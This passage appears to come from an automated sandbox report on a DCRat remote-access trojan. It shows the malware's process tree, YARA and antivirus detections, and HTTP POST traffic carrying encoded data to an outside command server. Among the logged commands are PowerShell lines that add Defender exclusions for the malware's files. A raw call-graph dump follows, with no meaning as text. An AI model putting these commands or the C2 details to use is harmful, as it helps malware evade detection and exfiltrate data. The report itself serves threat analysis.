                                                                                                                                                                        Jan 3, 2025 07:59:08.371340990 CET2516OUTData Raw: 5b 54 5e 59 58 59 55 5b 54 5b 59 5a 5b 52 57 58 5f 55 5a 5c 52 5d 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^YXYU[T[YZ[RWX_UZ\R]PFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D?>2!:&< (;_05[&?>!-784Z%*<&,'<#Y'$X.5
Jan 3, 2025 07:59:08.707544088 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:59:08.835349083 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:08 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 50104 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:59:08.923975945 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2080
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 50105 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:59:08.969907045 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:09.324436903 CET2516OUTData Raw: 5b 5c 5b 5c 58 56 50 59 54 5b 59 5a 5b 51 57 5e 5f 54 5a 5d 52 56 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\[\XVPYT[YZ[QW^_TZ]RVP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B+-=5/1$>8*X'4&?:5$V#+,Z$9C$ <9#Y'$X.9
Jan 3, 2025 07:59:09.654917955 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:59:09.791429043 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:09 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 50106 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:59:09.930385113 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
Jan 3, 2025 07:59:10.632061005 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:59:20.645888090 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:10 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Jan 3, 2025 07:59:29.904002905 CET2516OUTData Raw: 5b 54 5e 59 58 5c 50 5b 54 5b 59 5a 5b 5e 57 58 5f 55 5a 58 52 50 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^YX\P[T[YZ[^WX_UZXRPPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&A)-"#:(2?>;%%7%\&/%6B> (Y'<D$/'()#Y'$X.



                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:01:57:04
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Users\user\Desktop\updIMdPUj8.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\updIMdPUj8.exe"
                                                                                                                                                                        Imagebase:0xb20000
                                                                                                                                                                        File size:2'937'141 bytes
                                                                                                                                                                        MD5 hash:BC1FB66921DB74A0051917B26A4BD316
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:1
                                                                                                                                                                        Start time:01:57:04
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe"
                                                                                                                                                                        Imagebase:0x230000
                                                                                                                                                                        File size:147'456 bytes
                                                                                                                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:3
                                                                                                                                                                        Start time:01:57:21
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat" "
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:01:57:21
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:01:57:21
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe"
                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                        File size:2'615'296 bytes
                                                                                                                                                                        MD5 hash:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, Author: Joe Security
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                        • Detection: 78%, ReversingLabs
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe'
                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe'
                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:9
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:10
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'
                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\ZWgKQlTqcrSB.exe'
                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:12
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:13
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\Accessories\ZWgKQlTqcrSB.exe'
                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:14
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:15
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:16
                                                                                                                                                                        Start time:01:57:24
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:17
                                                                                                                                                                        Start time:01:57:25
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat"
                                                                                                                                                                        Imagebase:0x7ff6b6600000
                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:18
                                                                                                                                                                        Start time:01:57:25
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:19
                                                                                                                                                                        Start time:01:57:26
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:chcp 65001
                                                                                                                                                                        Imagebase:0x7ff785310000
                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:22
                                                                                                                                                                        Start time:01:57:27
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:ping -n 10 localhost
                                                                                                                                                                        Imagebase:0x7ff7aa2e0000
                                                                                                                                                                        File size:22'528 bytes
                                                                                                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:23
                                                                                                                                                                        Start time:01:57:32
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                        Imagebase:0x7ff693ab0000
                                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:24
                                                                                                                                                                        Start time:01:57:37
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\TAPI\ZWgKQlTqcrSB.exe"
                                                                                                                                                                        Imagebase:0x800000
                                                                                                                                                                        File size:2'615'296 bytes
                                                                                                                                                                        MD5 hash:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 78%, ReversingLabs
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:26
                                                                                                                                                                        Start time:01:57:42
                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false


                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:9.6%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:9.3%
                                                                                                                                                                          Total number of Nodes:1511
                                                                                                                                                                          Total number of Limit Nodes:42
24718->24781 24722 b27d50 24720->24722 24759 b28284 24720->24759 24721 b27d92 24721->24578 24722->24721 24787 b2138b 74 API calls 24722->24787 24726 b27bac 24725->24726 24728 b27bb3 24725->24728 24727 b32297 86 API calls 24726->24727 24727->24728 24730 b217ff 24729->24730 24741 b2185a __InternalCxxFrameHandler 24729->24741 24731 b21828 24730->24731 24742 b26c36 76 API calls __vswprintf_c_l 24730->24742 24733 b21887 24731->24733 24738 b21847 ___std_exception_copy 24731->24738 24735 b43e3e 22 API calls 24733->24735 24734 b2181e 24743 b26ca7 75 API calls 24734->24743 24737 b2188e 24735->24737 24737->24741 24745 b26ca7 75 API calls 24737->24745 24738->24741 24744 b26ca7 75 API calls 24738->24744 24741->24704 24742->24734 24743->24731 24744->24741 24745->24741 24747 b2ce4a __EH_prolog 24746->24747 24748 b3eb38 8 API calls 24747->24748 24750 b2ce8d 24748->24750 24749 b3eb38 8 API calls 24751 b2ceb1 24749->24751 24750->24749 24751->24712 24753 b34a80 __EH_prolog 24752->24753 24754 b3eb38 8 API calls 24753->24754 24755 b34a9c 24754->24755 24756 b27b8b 24755->24756 24758 b30e46 80 API calls 24755->24758 24756->24717 24758->24756 24760 b2828e __EH_prolog 24759->24760 24788 b213dc 24760->24788 24762 b282aa 24763 b282bb 24762->24763 24931 b29f42 24762->24931 24766 b282f2 24763->24766 24796 b21a04 24763->24796 24927 b21692 24766->24927 24769 b28389 24815 b28430 24769->24815 24772 b283e8 24823 b21f6d 24772->24823 24775 b282ee 24775->24766 24775->24769 24779 b2a56d 7 API calls 24775->24779 24935 b2c0c5 CompareStringW _wcslen 24775->24935 24777 b283f3 24777->24766 24827 b23b2d 24777->24827 24839 b2848e 24777->24839 24779->24775 24782 b2a582 24781->24782 24783 b2a5b0 24782->24783 25191 b2a69b 24782->25191 24783->24718 24785 b2a592 24785->24783 24786 b2a597 FindClose 24785->24786 24786->24783 24787->24721 24789 b213e1 __EH_prolog 24788->24789 24790 b2ce40 8 API calls 24789->24790 24791 b21419 24790->24791 24792 b3eb38 8 API calls 24791->24792 24795 b21474 __cftof 24791->24795 24793 
b21461 24792->24793 24793->24795 24936 b2b505 24793->24936 24795->24762 24797 b21a0e __EH_prolog 24796->24797 24799 b21a61 24797->24799 24804 b21b9b 24797->24804 24952 b213ba 24797->24952 24801 b21bc7 24799->24801 24799->24804 24805 b21bd4 24799->24805 24955 b2138b 74 API calls 24801->24955 24803 b23b2d 101 API calls 24807 b21c12 24803->24807 24804->24775 24805->24803 24805->24804 24806 b21c5a 24806->24804 24810 b21c8d 24806->24810 24956 b2138b 74 API calls 24806->24956 24807->24806 24809 b23b2d 101 API calls 24807->24809 24809->24807 24810->24804 24814 b29e80 79 API calls 24810->24814 24811 b23b2d 101 API calls 24812 b21cde 24811->24812 24812->24804 24812->24811 24813 b29e80 79 API calls 24813->24799 24814->24812 24974 b2cf3d 24815->24974 24817 b28440 24978 b313d2 GetSystemTime SystemTimeToFileTime 24817->24978 24819 b283a3 24819->24772 24820 b31b66 24819->24820 24979 b3de6b 24820->24979 24824 b21f72 __EH_prolog 24823->24824 24826 b21fa6 24824->24826 24987 b219af 24824->24987 24826->24777 24828 b23b39 24827->24828 24829 b23b3d 24827->24829 24828->24777 24838 b29e80 79 API calls 24829->24838 24830 b23b4f 24831 b23b6a 24830->24831 24832 b23b78 24830->24832 24833 b23baa 24831->24833 25117 b232f7 89 API calls 2 library calls 24831->25117 25118 b2286b 101 API calls 3 library calls 24832->25118 24833->24777 24836 b23b76 24836->24833 25119 b220d7 74 API calls 24836->25119 24838->24830 24840 b28498 __EH_prolog 24839->24840 24843 b284d5 24840->24843 24854 b28513 24840->24854 25144 b38c8d 103 API calls 24840->25144 24842 b284f5 24844 b284fa 24842->24844 24845 b2851c 24842->24845 24843->24842 24848 b2857a 24843->24848 24843->24854 24844->24854 25145 b27a0d 152 API calls 24844->25145 24845->24854 25146 b38c8d 103 API calls 24845->25146 24848->24854 25120 b25d1a 24848->25120 24850 b28605 24850->24854 25126 b28167 24850->25126 24853 b28797 24855 b2a56d 7 API calls 24853->24855 24856 b28802 24853->24856 24854->24777 24855->24856 25132 b27c0d 24856->25132 24858 b2d051 82 API 
